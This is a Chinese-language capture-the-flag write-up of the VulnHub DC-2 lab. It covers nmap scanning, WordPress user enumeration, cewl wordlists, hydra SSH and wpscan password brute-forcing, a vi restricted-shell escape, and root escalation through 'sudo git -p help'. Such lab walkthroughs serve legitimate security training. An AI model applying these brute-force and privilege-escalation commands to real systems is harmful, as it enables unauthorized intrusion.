vulnhub靶机实战_DC-2

┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.198.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 13:55 CST
Nmap scan report for 192.168.198.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:F7:F2:9C (VMware)
Nmap scan report for 192.168.198.128
Host is up (0.00031s latency).
MAC Address: 00:0C:29:75:2A:77 (VMware)
Nmap scan report for 192.168.198.254
Host is up (0.000095s latency).
MAC Address: 00:50:56:F9:B2:86 (VMware)
Nmap scan report for 192.168.198.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.98 seconds

nmap -p 1-65535 -A -v -T4 192.168.198.128
# 关键信息：
# Host is up (0.0015s latency).
# Not shown: 65533 closed tcp ports (reset)
# PORT     STATE SERVICE VERSION
# 80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
# |_http-title: Did not follow redirect to http://dc-2/
# |_http-server-header: Apache/2.4.10 (Debian)
# | http-methods: 
# |_  Supported Methods: GET HEAD POST OPTIONS
# 7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
# | ssh-hostkey: 
# |   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
# |   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
# |   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
# |_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
# MAC Address: 00:0C:29:75:2A:77 (VMware)

#修改hosts文件
vim /etc/hosts #添加 192.168.198.128 dc-2
cat /etc/hosts
#修改后结果：
# 127.0.0.1       localhost
# 127.0.1.1       kali.vkali.com  kali
# 192.168.198.128 dc-2
# # The following lines are desirable for IPv6 capable hosts
# ::1     localhost ip6-localhost ip6-loopback
# ff02::1 ip6-allnodes
# ff02::2 ip6-allrouters

┌──(root㉿kali)-[~]
└─# nmap --script=vuln 192.168.198.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 14:08 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.198.128
Host is up (0.000067s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
MAC Address: 00:0C:29:75:2A:77 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 55.54 seconds

# 关键提示：cewl
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
你通常的单词表可能不起作用，所以，也许你只需要保持冷静。
密码越多越好，但有时你无法赢得所有密码。
以一个身份登录以查看下一个标志。
如果找不到，请以其他身份登录。

# 将返回的字典存入cewl.txt文件中
cewl http://dc-2 -w cewl.txt
# 再将扫描时发现的三个用户存user.txt文件中

# -L 用户字典 -P 密码字典 -vV 详细信息 -t 线程数 -f 找到密码停止
hydra ssh://192.168.198.128:7744 -L user.txt -P cewl.txt -vV -t 64 -f
# 结果：
# [7744][ssh] host: 192.168.198.128   login: tom   password: parturient

# 登录
ssh tom@192.168.198.128 -p 7744
# 登录成功
# The programs included with the Debian GNU/Linux system are free software;
# the exact distribution terms for each program are described in the
# individual files in /usr/share/doc/*/copyright.

# Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
# permitted by applicable law.
# tom@DC-2:~$ 

wpscan --url http://dc-2 -U user.txt -P cewl.txt 
# 爆破结果：
# [!] Valid Combinations Found:
#  | Username: jerry, Password: adipiscing
#  | Username: tom, Password: parturient

If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
# 如果你不能利用WordPress并采取快捷方式，还有另一种方法。
# 希望你能找到另一个切入点。

# 关键词：su
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追着杰瑞跑。也许他应该弥补他造成的所有压力。

# 1 控制台直接输入vi
vi
# 进入到编辑页面,切换到底线命令模式: shift+:
:set shell=/bin/sh
# 回车后再次进入到底线命令模式：shift+：
:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
# 绕过

#关键词：git su
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!
# 很高兴看到你已经走了这么远，但你还没有回家。
# 你仍然需要获得最终的标志（唯一真正重要的标志！！）。
# 这里没有提示-你现在只能靠自己了。：-）
# 继续——滚出去！！！！

sudo git -p help 
!/bin/bash 

root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~#